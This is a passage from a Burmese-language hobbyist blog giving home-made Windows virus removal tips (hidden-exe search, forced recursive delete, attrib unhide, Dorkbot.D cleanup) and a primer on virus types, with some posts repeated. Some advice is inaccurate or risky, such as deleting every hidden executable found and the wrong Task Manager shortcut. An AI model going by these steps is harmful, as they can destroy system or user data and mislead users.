welcome to Sawlinux, this is sharing the site of PC

Video Post


stat counters
Follow us on Twitter Subscribe to RSS Subscribe via Email
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Saturday, June 1, 2013

Saw Linux  /  4:37 AM  /  ,   /  1 comment
virus file မ်ားရွာရန္ command တစ္ေၾကာင္းသာအဓိကလိုအပ္ပါတယ္။အထူးသျဖင့္ Made inMyanmar
 virus ေတြေပါ့။taskmanager , folder options , registry ေပ်ာက္ေနရင္ေတာ့ virus ၀င္တာေသခ်ာ
ပါျပီ။start>run>cmd ရုိက္ျပီး Enter ႏွိပ္ပါ။command prompt ထဲမွာ cd\ လို႕ရုိက္ျပီး Enter ႏွိပ္ပါ။

command prompt မွာ c:\ လို႕ေပၚရပါမယ္။ေနာက္တစ္ခုရုိက္ရမွာက dir/ah *.exe /s/p/b လို႕ရုိက္ျပီး Enter ႏွိပ္ပါ။
virus ရဲ႕ source file မ်ားေပၚလာပါလိမ့္မယ္။
အခုနာမည္ၾကီးေနတဲ့ Loikaw , Funny , chrome , mgy.exe တို႕ကို စမ္းျပီးပါျပီ။ virus file အကုန္
လုံးေတြ႕ပါတယ္။
ဒီ virus file ေတြရဲ႕ process ကို kill ျပီးမွသတ္လို႕ရပါတယ္။အဲဒီအတြက္ process explorer software နဲ႕ၾကည့္လို႕ရပါတယ္။

download  process explorer software

 ။command prompt မွာေပၚတဲ့ virus file name က process explorer မွာေပၚရင္ process ကို kill ျပီးvirus ကိုသတ္ပါ။ဒီ command ေလးရွိေတာ့ virus file ကိုအလြယ္တကူရွာျပီးသတ္လို႕ရတာေပါ့။
အဆင္ေျပပါေစဗ်ာ။

file ေတြ ဖ်က္တာကေတာ့ del filename /s/f/a ပါ။ eg del chrome.exe /s/f/a ပါ။ s ဆိုသည္မွာ file ရွိတဲ့ folder ေကာ္ သူ႕ရဲ႕ sub-folder ေတြပါဖ်က္တာပါ။ f ကေတာ့ force deleting ပါ။
a ကေတာ့ attrib လုပ္ထားတဲ့ file ေတြကိုဖ်က္တာပါ။ a ထည့္လိုက္ျခင္းျဖင့္ hidden , read only ,system တို႕ကိုဖ်က္လို႕ရပါတယ္။ attrib chrome.exe -s -h -r ဆိုျပီးလုပ္စရာမလုိပါ။ တစ္ခါတည္းျဖတ္ပစ္တာပါ။

dir/ah *.exe /s/p/b စစ္လို႕ေပၚလာတိုင့္ virus လို႕ေျပာလို႕မရပါ။ virus name နဲ႕ process explorer
 မွာျပတဲ့ name နဲ႕တိုက္ၾကည့္လို႕ေတြ႔မွသာ virus ပါ။ eg. mgy virus ၀င္ေနလို႕ရွာမယ္ဆိုပါစို႕။

 cmd မွာ dir/ah *.exe /s/p/b လို႕ရုိက္ပါ။ mgy.exe ေပၚေနပါလိမ့္မယ္။ process explorer ကိုဖြင့္ပါ။
 mgy.exe အလုပ္လုပ္ေနတာကိုျပေနပါလိမ့္မယ္။

ဒီနည္းအတိုင္းတျခား virus မ်ားကိုရွာေဖြႏုိင္ပါတယ္။ dir/ah *.exe /s/p/bလုိ႕စစ္လို႕ ေတြ႕တဲ့ file မ်ားကိုအကုန္ဖ်က္လို႕ရပါတယ္။

ဒါဆိုပိုစိတ္ခ်ရတာေပါ့။တခ်ိုဳ႕ virus ကိုက္လို႕ command prompt ေခၚလုိ႕မရရင္ windows ကို restart လုပ္ပါ။ post လုပ္ေနတဲ့အခ်ိန္မွာ F8 key ကိုဆက္တိုက္ႏုိပ္ထားပါ။
Safe Mode options ေပၚလာရင္ Safe Mode with command prompt ကိုေရြးပါ။ command prompt
 ေပၚလာရင္ dir/ah *.exe /s/p/b လို႕ရုိက္ပါ။ေတြ႕သမ်ွ file ကိုဖ်က္ပါ။သူ႕ရဲ႕ process ကို kill စရာမလိုေတာ့ပါဘူး။တစ္ခါတည္း delete လုပ္ပါ။ ေနာက္ျပီး command prompt မွာ msconfig လို႕ရုိက္ပါ။
startup Tab ကိုသြားျပီး ခုနက command prompt မွာ ေပၚတဲ့ file မ်ားကိုအမွန္ျခစ္ျဖဳတ္ပါ။ဒါဆိုရင္ virus ပါတစ္ခါတည္းသတ္နည္းပါ။


ref : Mantalaythar

Tuesday, December 25, 2012

Saw Linux  /  5:19 AM  /  ,   /  No comments
က်ေနာ္အခ်ိန္မရတာနဲ႔ ပို႔စ္အသစ္ေတြသိပ္မတင္ျဖစ္ဘူး။ ဒီၾကားထဲ address အသစ္ပါေျပာင္းလိုက္ေတာ့ တစ္ခ်ိဳ႕ လာဖတ္သူေတြအတြက္ ဒုကၡျဖစ္သြားတယ္။ က်ေနာ္အခ်ိန္ရတာနဲ႔ သိတာေလးေတြကို ရွယ္ေပးဖို႔အျမဲစိတ္ကူးရွိေနပါတယ္။ အခုလဲေမးေမးေနၾကတဲ့ External HD မွာ Folders ေတြ Shout Cut ျဖစ္သြားတာကိုေျဖရွင္းနည္းေလးတင္ေပးလိုက္တယ္။ Sort cut virus remover ေဆာ့၀ဲကိုလဲ က်ေနာ္တင္ခဲ့ျပီးပါျပီ။ လိုအပ္ရင္ ျပီးခဲ့တဲ့ပို႔စ္ေတြမွာ ရွာၾကည့္လိုက္ပါ။ နည္းေတြစံုရင္ ပိုေကာင္းတယ္မလား။ အခုလဲ ဒီနည္းကိုၾကိဳက္တယ္ဆိုရင္ စမ္းႏိုင္ေအာင္ ထပ္မံတင္ျပလိုက္တယ္။

External HD မွာ Folders ေတြ Shout Cut ျဖစ္သြားတာကိုေျဖရွင္းနည္း

 ေအာက္ပါအဆင့္ (၃) ဆင့္နဲ႔ေျဖရွင္းၾကရေအာင္....

အဆင့္ (၁)
1. Autorun Exterminator ေဆာ့၀ဲကုိ ေအာက္ပါလင့္မွာ အရင္ Download ခ်လုိက္ပါ။
Download
2.မိမိ External hard Disk ကုိ ကြန္ပ်ဴတာမွ အရင္တပ္ထားရပါမည္။ ျပီးတာနဲ႕ Autorun Exterminator ကုိ Double click ေပးလုိက္ပါ။ Double click ဖြင္႔ျပီးတာနဲ႕ Open Log ကုိ click ေပးတာနဲ႕ သူက Autorun.inf ကုိ ေတြ႕တာနဲ႕ Remove လုပ္ေပးပါလိမ္႔မည္။

အဆင့္ (၂) က CMD နဲ႔ေျဖရွင္းနည္း 
1. ကီးဘုတ္ေပၚက Win + R ကိုတြဲႏွိပ္ျပီး Run ေဘာက္စ္ကိုဖြင့္ပါ။ cmd လုိ႕ရုိက္ျပီး Enter ေခါက္ပါ။ 2. ေအာက္က command ကုိ ရုိက္ျပီး Enter ေခါက္ပါ။ မွတ္ခ်က္ f သည္ မိမိ ရဲ႕ External Hard Disk ရဲ႕ Drive letter လို႔မွတ္ထားပါ၊ ကိုယ့္စက္ drive letter အလိုက္ေျပာင္းလဲသတ္မွတ္ပါ။

attrib -h -r -s /s /d f:\*.* 

အဆင့္ (၃) 
1. ေအာက္က လင့္မွာ Anti Malware ပရိုဂရမ္ကို Download ခ်ပါ။
Download
2. ျပီးေတာ့ အဲဒါကို update >> Perform “ Full Scan “ လုပ္ပါ။ အားလံုးျပီးရင္ စက္ကို Restart ခ်။ အဆင္ေျပမယ္လို႔ထင္ပါတယ္။ အဆင္မေျပေသးဘူးဆိုရင္ ေအာက္ ပါ လင့္မွာ Short Cut Virus Remover ေဆာ့၀ဲနဲ႔ ထပ္ေျဖရွင္းၾကည့္ပါ။
Short Cut Virus Remover

 ေစာလင္းနက္စ္

Wednesday, June 27, 2012

Saw Linux  /  4:11 AM  /    /  No comments
ေဆာ့၀ဲေကာင္းေတြေတြ႕ရင္ ေဒါင္းလုဒ္ခ်င္တဲ့ ၀ါသနာပါေတာ့ Win32/Dorkbot.D Worm ေတြ႕ပါေလေရာ။ အဲဒီ
ေန႔ကေဒါင္းထားတာမ်ားေတာ့ ဘယ္ကေန၀င္လာမွန္းေတာင္မသိလိုက္ဘူး။ ေဒါင္းထားတဲ့လင့္ေတြျပီးတဲ့အခါ HDD (Harddisk) ဖိုလ္ဒါေတြတစ္ခုမွမေတြ႕ေတာ့ဘူး။သိုေလာင္ထားတဲ့ေဒတာေတြကလည္းGB 290 ေလာက္ရွိတယ္။ ဒီေဒတာေတြျပန္ယူဖို႔မခက္ေပမယ့္ ေပးရမည့္အခ်ိန္ကိုေတာ့ ေတာ္္၀န္ေလးမိတယ္။ ၾကံဳလာရင္ေတာ့ ေျဖရွင္းရမယ္
ေလ။ အခုဒီ Worm ရဲ႕ သေဘာသြားျဖစ္စဥ္ေလးေတြကို စာဖတ္ သူမ်ားသိႏိုင္ေအာင္ ျပန္လည္ေဖါက္သည္ခ်ေပး
တဲ့ သေဘာပါပဲ။

Win32/Dorkbot.D ဆိုတာ network မွာကပ္ပါလာတဲ့ Window အတြက္ Win32 worm ဗိုင္းရပ္စ္အမ်ိဳးအစားတစ္ ခုျဖစ္ပါတယ္။ Win32/Dorkbot.D Worm သည္ system နဲ႔ external hard driveတစ္ခုလံုး လွ်င္လွ်င္ျမန္ျမန္ကူး စက္ႏိုင္ပါတယ္။ အထူးသျဖင့္ external hard drive မွာ ရွိတဲ့ဖိုလ္ဒါအားလံုးကို hide ျဖစ္ေအာင္လုပ္ထားလိုက္တယ္။
ေနာက္ျပီး သူ႔ကို အန္တီဗိုင္းရပ္စ္ေဆာ့၀ဲေတြ scan လုပ္လို႔မရႏိုင္ေအာင္ system file ပံုစံမ်ိဳးလိုဆင္တူေအာင္လုပ္
ထား တယ္။ Win32/Dorkbot.D Worm သည္ registry entry က system file ေတြကို ေျပာင္းေရးတယ္။ ဒီဗိုင္းရပ္ စ္ (worm) ကူးစက္ခံရတယ္လို႔သိလွ်င္သိခ်င္း external hard drive ေသာ္၎၊ usb flash drive ေသာ္၎ လံုး၀လံုး
၀ မိမိစက္မွာသြားမထိုးပါနဲ႔။ သြားထိုးလိုက္တာနဲ႔ မိမိ ၎ drive မွာ ရွိတဲ့ဖိုလ္ဒါမွန္သမွ် hide ေပ်ာက္ကြယ္သြားမွာျဖစ္
ပါတယ္။ usb flash drive ေတြမွာျပႆနာမရွိႏိုင္ေပမယ့္ external hard drive ေတြအတတြက္ေတာ့ ေခါင္းခဲရျပီး
ေပါ့။

Eset NOD 32 အသံုးျပဳတဲ့စက္ေတြမွာ အဲဒီ worm ကူးစက္ခံရရင္ သူ႔ရဲ႕ မက္ေစ့ဂ်္ေတြ မၾကာၾကာျပလာမွာျဖစ္ပါ
တယ္။ ဒါဆို မိမိစက္မွာကူးစက္ခံရတဲ့ ဗိုင္းရပ္စ္အမ်ိဳးအစားကိုသိႏိုင္ပါျပီ။

Win32/Dorkbot.D Worm ရဲ႕ ကူးစက္ျပန္႔ႏွံ႔မႈအေနအထား…

• Win32/Dorkbot.D is a malicious Worm
• Win32/Dorkbot.D can replicate via the network easily
• Win32/Dorkbot.D can propagate via e-mail to contact in your address book
• Win32/Dorkbot.D may come with or spread other spywares
• Win32/Dorkbot.D can cause the infected computer work slow and it’s difficult to remove Win32/Dorkbot.D
• Win32/Dorkbot.D steals your privacy information and compromises your security


Win32/Dorkbot.D Worm ကိုရွင္းထုတ္နည္း

၁။ Ctrl+Shift+Delete ကိုႏွိပ္ျပီး Windows Task Manager ကိုဖြင့္ပါ။ ထိုေနာက္ Processes tab ကိုႏွိပ္ျပီး Win32/Dorkbot.D process ကိုရွာပါ။ ေတြ႕ရင္ ေရြးျပီး End Process ကိုေပးလိုက္ပါ။

၂။ ေအာက္ပါ ဖိုင္မ်ားကိုတည္ရွိတတ္တဲ့ေနရာကေန ေတြ႕ေအာင္ရွာပါ…

(က) %PROGRAM_FILES%\Win32/Dorkbot.D
(ခ) c:\Documents and Settings\All Users\Start Menu\Win32/Dorkbot.D
(ဂ) c:\Documents and Settings\All Users\Win32/Dorkbot.D
ေတြ႕ရင္ ၎တို႔ကို delete ေပးလိုက္ပါ။

၃။ Run ေဘာက္စ္ကေန Registry Editor (regedit) ကိုဖြင့္လိုက္ပါ။ Registry Editor ပြင့္လာရင္ေအာက္ပါ
Registry key ေတြကိုရွာပါ…
HKEY_LOCAL_MACHINE\Software\Win32/Dorkbot.D” ေတြ႕ရင္ ၎ကို Right Click > ေထာက္ျပီး
ေအာက္ပါ ကီးေတြကို delete လုပ္ပါ။
"%variable%" = "%appdata%\%variable%.exe"

အဲဒါေတြအားလံုးျပီးလွ်င္ ကြန္ပ်ဴတာကို Restart ။

အထက္ေျဖရွင္းနည္းေတြနဲ႔ အဆင္မေျပခဲ့ရင္ ေဆာ့၀ဲနဲ႔ေျဖရွင္းတဲ့နည္းေတြလည္းမ်ားစြာေပးထား
တာေတြ႕ရပါတယ္။ က်ေနာ္က အထက္ပါေျဖရွင္းနည္းအျပင္ PC Tool Spyware Doctor Full
Version ျဖစ္တဲ့ေဆာ့၀ဲနဲ႔လည္း ေျဖရွင္းေစခ်င္ပါတယ္။ က်ေနာ္ကေတာ့ ဒီေဆာ့၀ဲနဲ႔ပဲအဆင္ေျပသြား
ပါတယ္။ ဒါေပမယ့္ external hard drive ထဲက ဖိုလ္ဒါေတြျပန္မေပၚေသးရင္ Data Recovery လုပ္
ရေတာ့မွာျဖစ္ပါတယ္။ အဲဒီအခါက်ရင္ မိမိကၽြမ္းက်င္ရာကို Recovery လုပ္လို႔ရပါသည္။

အေကာင္းဆံုးကေတာ့ Linux Live CD/DVD ကို အသံုးျပဳျပီး Data Recovery အတြက္ ပိုအဆင္ေျပ
ႏိုင္သည္။ အကယ္၍ အဲဒါနဲ႔မသံုးတတ္ရင္ Power Data Recovery ေဆာ့၀ဲကိုအသံုးျပဳရင္လည္း Recoveryျပႆနာေျပလည္သြားႏိုင္သည္။

အဲဒါေတြလုပ္ျပီးရင္ external hard drive ကို Disk Management မွာ သြားျပီး delete လုပ္လိုက္ေပ
ေတာ့ အဲဒါမွစိတ္ခ်ရမယ္ေဟ…။

ေစာလင္းနက္စ္
Saw Linux  /  4:11 AM  /    /  No comments
ေဆာ့၀ဲေကာင္းေတြေတြ႕ရင္ ေဒါင္းလုဒ္ခ်င္တဲ့ ၀ါသနာပါေတာ့ Win32/Dorkbot.D Worm ေတြ႕ပါေလေရာ။ အဲဒီ
ေန႔ကေဒါင္းထားတာမ်ားေတာ့ ဘယ္ကေန၀င္လာမွန္းေတာင္မသိလိုက္ဘူး။ ေဒါင္းထားတဲ့လင့္ေတြျပီးတဲ့အခါ HDD (Harddisk) ဖိုလ္ဒါေတြတစ္ခုမွမေတြ႕ေတာ့ဘူး။သိုေလာင္ထားတဲ့ေဒတာေတြကလည္းGB 290 ေလာက္ရွိတယ္။ ဒီေဒတာေတြျပန္ယူဖို႔မခက္ေပမယ့္ ေပးရမည့္အခ်ိန္ကိုေတာ့ ေတာ္္၀န္ေလးမိတယ္။ ၾကံဳလာရင္ေတာ့ ေျဖရွင္းရမယ္
ေလ။ အခုဒီ Worm ရဲ႕ သေဘာသြားျဖစ္စဥ္ေလးေတြကို စာဖတ္ သူမ်ားသိႏိုင္ေအာင္ ျပန္လည္ေဖါက္သည္ခ်ေပး
တဲ့ သေဘာပါပဲ။

Win32/Dorkbot.D ဆိုတာ network မွာကပ္ပါလာတဲ့ Window အတြက္ Win32 worm ဗိုင္းရပ္စ္အမ်ိဳးအစားတစ္ ခုျဖစ္ပါတယ္။ Win32/Dorkbot.D Worm သည္ system နဲ႔ external hard driveတစ္ခုလံုး လွ်င္လွ်င္ျမန္ျမန္ကူး စက္ႏိုင္ပါတယ္။ အထူးသျဖင့္ external hard drive မွာ ရွိတဲ့ဖိုလ္ဒါအားလံုးကို hide ျဖစ္ေအာင္လုပ္ထားလိုက္တယ္။
ေနာက္ျပီး သူ႔ကို အန္တီဗိုင္းရပ္စ္ေဆာ့၀ဲေတြ scan လုပ္လို႔မရႏိုင္ေအာင္ system file ပံုစံမ်ိဳးလိုဆင္တူေအာင္လုပ္
ထား တယ္။ Win32/Dorkbot.D Worm သည္ registry entry က system file ေတြကို ေျပာင္းေရးတယ္။ ဒီဗိုင္းရပ္ စ္ (worm) ကူးစက္ခံရတယ္လို႔သိလွ်င္သိခ်င္း external hard drive ေသာ္၎၊ usb flash drive ေသာ္၎ လံုး၀လံုး
၀ မိမိစက္မွာသြားမထိုးပါနဲ႔။ သြားထိုးလိုက္တာနဲ႔ မိမိ ၎ drive မွာ ရွိတဲ့ဖိုလ္ဒါမွန္သမွ် hide ေပ်ာက္ကြယ္သြားမွာျဖစ္
ပါတယ္။ usb flash drive ေတြမွာျပႆနာမရွိႏိုင္ေပမယ့္ external hard drive ေတြအတတြက္ေတာ့ ေခါင္းခဲရျပီး
ေပါ့။

Eset NOD 32 အသံုးျပဳတဲ့စက္ေတြမွာ အဲဒီ worm ကူးစက္ခံရရင္ သူ႔ရဲ႕ မက္ေစ့ဂ်္ေတြ မၾကာၾကာျပလာမွာျဖစ္ပါ
တယ္။ ဒါဆို မိမိစက္မွာကူးစက္ခံရတဲ့ ဗိုင္းရပ္စ္အမ်ိဳးအစားကိုသိႏိုင္ပါျပီ။

Win32/Dorkbot.D Worm ရဲ႕ ကူးစက္ျပန္႔ႏွံ႔မႈအေနအထား…

• Win32/Dorkbot.D is a malicious Worm
• Win32/Dorkbot.D can replicate via the network easily
• Win32/Dorkbot.D can propagate via e-mail to contact in your address book
• Win32/Dorkbot.D may come with or spread other spywares
• Win32/Dorkbot.D can cause the infected computer work slow and it’s difficult to remove Win32/Dorkbot.D
• Win32/Dorkbot.D steals your privacy information and compromises your security


Win32/Dorkbot.D Worm ကိုရွင္းထုတ္နည္း

၁။ Ctrl+Shift+Delete ကိုႏွိပ္ျပီး Windows Task Manager ကိုဖြင့္ပါ။ ထိုေနာက္ Processes tab ကိုႏွိပ္ျပီး Win32/Dorkbot.D process ကိုရွာပါ။ ေတြ႕ရင္ ေရြးျပီး End Process ကိုေပးလိုက္ပါ။

၂။ ေအာက္ပါ ဖိုင္မ်ားကိုတည္ရွိတတ္တဲ့ေနရာကေန ေတြ႕ေအာင္ရွာပါ…

(က) %PROGRAM_FILES%\Win32/Dorkbot.D
(ခ) c:\Documents and Settings\All Users\Start Menu\Win32/Dorkbot.D
(ဂ) c:\Documents and Settings\All Users\Win32/Dorkbot.D
ေတြ႕ရင္ ၎တို႔ကို delete ေပးလိုက္ပါ။

၃။ Run ေဘာက္စ္ကေန Registry Editor (regedit) ကိုဖြင့္လိုက္ပါ။ Registry Editor ပြင့္လာရင္ေအာက္ပါ
Registry key ေတြကိုရွာပါ…
HKEY_LOCAL_MACHINE\Software\Win32/Dorkbot.D” ေတြ႕ရင္ ၎ကို Right Click > ေထာက္ျပီး
ေအာက္ပါ ကီးေတြကို delete လုပ္ပါ။
"%variable%" = "%appdata%\%variable%.exe"

အဲဒါေတြအားလံုးျပီးလွ်င္ ကြန္ပ်ဴတာကို Restart ။

အထက္ေျဖရွင္းနည္းေတြနဲ႔ အဆင္မေျပခဲ့ရင္ ေဆာ့၀ဲနဲ႔ေျဖရွင္းတဲ့နည္းေတြလည္းမ်ားစြာေပးထား
တာေတြ႕ရပါတယ္။ က်ေနာ္က အထက္ပါေျဖရွင္းနည္းအျပင္ PC Tool Spyware Doctor Full
Version ျဖစ္တဲ့ေဆာ့၀ဲနဲ႔လည္း ေျဖရွင္းေစခ်င္ပါတယ္။ က်ေနာ္ကေတာ့ ဒီေဆာ့၀ဲနဲ႔ပဲအဆင္ေျပသြား
ပါတယ္။ ဒါေပမယ့္ external hard drive ထဲက ဖိုလ္ဒါေတြျပန္မေပၚေသးရင္ Data Recovery လုပ္
ရေတာ့မွာျဖစ္ပါတယ္။ အဲဒီအခါက်ရင္ မိမိကၽြမ္းက်င္ရာကို Recovery လုပ္လို႔ရပါသည္။

အေကာင္းဆံုးကေတာ့ Linux Live CD/DVD ကို အသံုးျပဳျပီး Data Recovery အတြက္ ပိုအဆင္ေျပ
ႏိုင္သည္။ အကယ္၍ အဲဒါနဲ႔မသံုးတတ္ရင္ Power Data Recovery ေဆာ့၀ဲကိုအသံုးျပဳရင္လည္း Recoveryျပႆနာေျပလည္သြားႏိုင္သည္။

အဲဒါေတြလုပ္ျပီးရင္ external hard drive ကို Disk Management မွာ သြားျပီး delete လုပ္လိုက္ေပ
ေတာ့ အဲဒါမွစိတ္ခ်ရမယ္ေဟ…။

ေစာလင္းနက္စ္

Wednesday, April 18, 2012

Saw Linux  /  8:05 AM  /    /  No comments
ဘာေတြအေတြ႔မ်ားလဲ။ ကၽြန္ေတာ့္စက္မွာေတာ့ Folder Option မေပၚေတာ့ပါဘူး။ Virus ကိုက္ေနျပီ။ ဘယ္ Virus အသစ္ေတြကေတာ့ ေပၚလာျပန္ၿပီ။ ကယ္ၾကပါ...ဒီမွာ ဘယ္လုိသတ္သတ္ မေသဘူး အဲဒါေတြမ်ားေနတယ္မလား။ ဟုတ္တယ္ Virus..Virus..။ လူေတြကို ေတာ္ေတာ္ ဒုကၡေပးတယ္။ ကုမၸဏီေတြကိုလည္း ဒုကၡေပးတယ္။ ႀကီးႀကီးငယ္ငယ္ အရြယ္အားလံုးကို ဒုကၡေပးတယ္။ ၾကားရင္ေတာ့ ရယ္စရာေကာင္းေနမလားမသိဘူး။ ကြန္ပ်ဴတာ Virus ဆိုတာ သတင္းေတြ၊ အခ်က္အလက္ေတြအားလံုးအတြက္ အံ့ဩဖြယ္ရာသက္တမ္း အရွည္ဆံုးျဖစ္ပါတယ္။ ေနာက္တစ္ခုေျပာေသးတာက Virus ဆိုတာ ကိုယ္ေတြဘယ္ေလာက္ တန္ဖိုးရွိလည္း ေတာ္လဲတတ္လဲဆိုတာ ေျပာျပေပးတဲ့ေကာင္တ့ဲ။ အင္း.. ဒီလိုဆိုေတာ့ Virus ကို ထုိင္ေတာင္ ရွိခိုးခ်င္စိတ္ေပါက္သြားၿပီ။ ေသေသခ်ာခ်ာ ထြင္ထားတဲ့ Virus တစ္ခုကဆိုးက်ဳိးေပးတာ၊ ထိခိုက္ေစတာ ပိုမ်ားတယ္။ ေနာက္ပိုက္ဆံသန္းေပါင္းမ်ားစြာကို နစ္နာေစတယ္။ ဟုတ္တယ္ေနာ္..သူေျပာထားတာလည္း ဟုတ္သားပဲ။ Virus တစ္ခု ေပၚလာတာက လူေတြေၾကာင့္ပဲ မဟုတ္လား။ ဒီေတာ့ သူတို႔က ပိုထိခိုက္ေစေလ လူေတြေတာ္ေၾကာင္း ပိုၾကြားသလို ျဖစ္ေလပဲေပါ့။ ထြင္တဲ့လူေတြကိုပဲ ေက်းဇူးတင္ပါတယ္ လုိက္ေျပာရမလုိပဲေနာ္။ Virus ဆိုတာကလည္း တစ္ႏွစ္ၿပီးတစ္ႏွစ္ကို ေပၚလာတာအမ်ဳိးမ်ဳိးပဲ။ ၂၀၀၄၊ ဇန္န၀ါရီတုန္းကဆို Mydoom Worm ေပၚလာၿပီး တစ္ရက္တည္းမွာတင္ မီလ်ံေလးပံုတစ္ပံုေလာက္ ရွိတဲ့ Computer ေတြကို ကူးသြားတာ။ ၿပီးခဲ့တဲ့ ၁၉၉၉ မတ္လတုန္းကလည္း ၾကည့္ပါလား။ Melissa Virus ဆိုျပီး ေပၚလာတယ္ေလ။ Microsoft နဲ႔တစ္ျခားကုမၸဏီ အႀကီးႀကီးေတြ အားလံုး Virus ရွိေနသမွ် သုူတုိ႔ E-mail System ေတြကို သံုးလုိ႔မရဘူးျဖစ္သြားတာ။ ၂၀၀၀ ျပည့္ႏွစ္တုန္းက I Love You Virus တုန္းကလည္းဒီအတုိင္းပဲ။ ေဟာ.. ၂၀၀၇၊ ဇန္န၀ါရီလည္း ေရာက္ေရာ Storm ဆိုတဲ့ Worm တစ္ေကာင္ေပၚလာျပန္ေရာ။ အဲဒီ Virus ေၾကာင့္ ေအာက္တုိဘာလလည္းက်ေရာ ကြန္ပ်ဴတာေပါင္း သန္း ၅၀ အထက္ကို အကူးခံရပါေရာလား။ ကဲၾကည့္ေလ..ဘယ္ေလာက္ေတာင္ အထင္ႀကီးစရာေကာင္းတဲ့ Virus ေတြလဲလို႔..။ IT နဲ႔ ပတ္သက္တဲ့ သတင္းေတြကို နားေထာင္တဲ့လူတိုင္းက Virus ကူးပံုကူးနည္းအမ်ဳိးမ်ဳိး အေၾကာင္းၾကားေနရမွာ အမွန္ပဲ။ ဒီေအာက္မွာေဖာ္ျပေပးထားတဲ့ Viruses ေတြကို ေဖာ္ျပေပးထားပါတယ္။

(၁)Viruses

Virus ဆိုတဲ့ေကာင္က Software ေလးပဲ။ Software မွာမွ တကယ့္ လူေတြအသံုးမ်ားတဲ့၊ သံုးေနတဲ့ Program ေတြ၊ ေနာက္မွာကပ္ပါးလ်က္ပါး ခိုးေၾကာင္ခိုး၀ွက္လုိက္လာတဲ့ ေကာင္ေတြေပါ့။ ဥပမာေျပာရရင္ Spreadsheet Program ေလး ေနာက္မွာ Virus ေလးကကပ္ပါလာတယ္ဆိုပါေတာ့။ ဒီေတာ့ အဲဒီ Spreadsheet Program Run တိုင္း၊ Run တိုင္းမွာ Virus Program ေလးကလည္းလိုက္ Run ေနတာေပါ့။ ဒီေကာင္က Program တစ္ခုမွာ ကပ္ရံုနဲ႔ မၿပီးဘူး။ၿဂိဳလ္သားေတြလုိပဲ.. ပြားႏို္င္တယ္။ အခု ဒီ Program ကေန၊ ေနာက္ Program ေတြကိုလည္း လုိက္ကပ္ႏုိ္င္ေသးတယ္။

(၂)Email Virus

Email Virus ကေတာ့ Email Virus ဆိုတဲ့အတုိင္းပဲ။ လူေတြ လူေတြ ပို႔သမွ် Email ေနာက္ကေန ကပ္လိုက္သြားတာလား။ လုိက္လည္းလုိက္သြားျပီးေရာ အကူးခံရတဲ့ လူရဲ႕ Address Book ထဲကေန၀င္ျပီး တစ္ျခားလူေတြဆီ သူ႔ဟာသူ ေအာ္တုိ Mail ေတြ ပို႔ေတာ့တာပဲ။ အဲဒီေတာ့ အပို႔ခံရတဲ့ လူကမသိ၊ ဖြင့္လည္းဖြင့္လုိက္ေရာ သူ႔ Address Book ထဲ ပါ၀င္ၿပီး ကူးျပီးေတာ့ ေနာက္လူေတြပါ ဆက္ပို႔ေတာ့တာပဲ။ တစ္ဆင့္ကူး၊ တစ္ဆင့္ကူးနဲ႔ ပလူပ်ံကုန္ေတာ့ တာေပါ့။ G-Galk Virus က အဲဒီလိုမ်ဳိးသြားတာေလ။

(၃)Trojan Horses

Trojan Horses ကလည္း ကြန္ပ်ဴတာ Program တစ္ခုပဲ။ ဒါေပမယ့္ ဒီေကာင္က အေယာင္ေဆာင္ေကာင္။ ဥပမာ-Game လိုလို၊ ဘာလိုလို အေယာင္ေဆာင္ထားတာေပါ့။ ကိုယ္ကမသိလို႔သြားလည္း Run လုိက္ေရာ...ကိုယ့္စက္ႀကီးဖ်က္ခံရပါေလေရာ..။ အခန္႔မသင့္ရင္ Hard Disk ကိုေတာင္ ၀င္ကိုက္သြားတာေနာ္။ ဒါေပမယ့္ ဒီေကာင္က သူ႔ဟာသူမပြားႏိုင္ဘူး။

(၄)Worms

Worm ကေတာ့ Network ေတြ၊ Security ေတြရဲ႕ ယိုေပါက္ေတြကေန တစ္ဆင့္ ကူးျပီး သူ႔ဟာသူ ဆက္ပြားသြားတာ။ Worm ရဲ႕ Copy ေကာင္က ဘယ္စက္မွာ Security ပိုင္း ယိုကြက္/ ဟာကြက္ရွိေနလဲလိုက္ေခ်ာင္း၊ ေခ်ာင္းျပီးလို႔ေတြ႔တာနဲ႔ကူးေတာ့တာပဲ။ ကူးျပီးတာနဲ႔ ဘယ္စက္ကို ထပ္ကူးရင္ေကာင္းမလဲ ထပ္ရွာတယ္။ အဲဒီလိုနဲ႔ မ်ဳိးပြားတဲ့ ေကာင္ေတြ၊ ေရာက္ရာအရပ္မွာ မ်ဳိးေစ့ခ်တယ္ေလ။ ကဲ ဒါကေတာ့ Worms Virus ပါပဲ။

source:ICT Reader
Saw Linux  /  8:05 AM  /    /  1 comment
ဘာေတြအေတြ႔မ်ားလဲ။ ကၽြန္ေတာ့္စက္မွာေတာ့ Folder Option မေပၚေတာ့ပါဘူး။ Virus ကိုက္ေနျပီ။ ဘယ္ Virus အသစ္ေတြကေတာ့ ေပၚလာျပန္ၿပီ။ ကယ္ၾကပါ...ဒီမွာ ဘယ္လုိသတ္သတ္ မေသဘူး အဲဒါေတြမ်ားေနတယ္မလား။ ဟုတ္တယ္ Virus..Virus..။ လူေတြကို ေတာ္ေတာ္ ဒုကၡေပးတယ္။ ကုမၸဏီေတြကိုလည္း ဒုကၡေပးတယ္။ ႀကီးႀကီးငယ္ငယ္ အရြယ္အားလံုးကို ဒုကၡေပးတယ္။ ၾကားရင္ေတာ့ ရယ္စရာေကာင္းေနမလားမသိဘူး။ ကြန္ပ်ဴတာ Virus ဆိုတာ သတင္းေတြ၊ အခ်က္အလက္ေတြအားလံုးအတြက္ အံ့ဩဖြယ္ရာသက္တမ္း အရွည္ဆံုးျဖစ္ပါတယ္။ ေနာက္တစ္ခုေျပာေသးတာက Virus ဆိုတာ ကိုယ္ေတြဘယ္ေလာက္ တန္ဖိုးရွိလည္း ေတာ္လဲတတ္လဲဆိုတာ ေျပာျပေပးတဲ့ေကာင္တ့ဲ။ အင္း.. ဒီလိုဆိုေတာ့ Virus ကို ထုိင္ေတာင္ ရွိခိုးခ်င္စိတ္ေပါက္သြားၿပီ။ ေသေသခ်ာခ်ာ ထြင္ထားတဲ့ Virus တစ္ခုကဆိုးက်ဳိးေပးတာ၊ ထိခိုက္ေစတာ ပိုမ်ားတယ္။ ေနာက္ပိုက္ဆံသန္းေပါင္းမ်ားစြာကို နစ္နာေစတယ္။ ဟုတ္တယ္ေနာ္..သူေျပာထားတာလည္း ဟုတ္သားပဲ။ Virus တစ္ခု ေပၚလာတာက လူေတြေၾကာင့္ပဲ မဟုတ္လား။ ဒီေတာ့ သူတို႔က 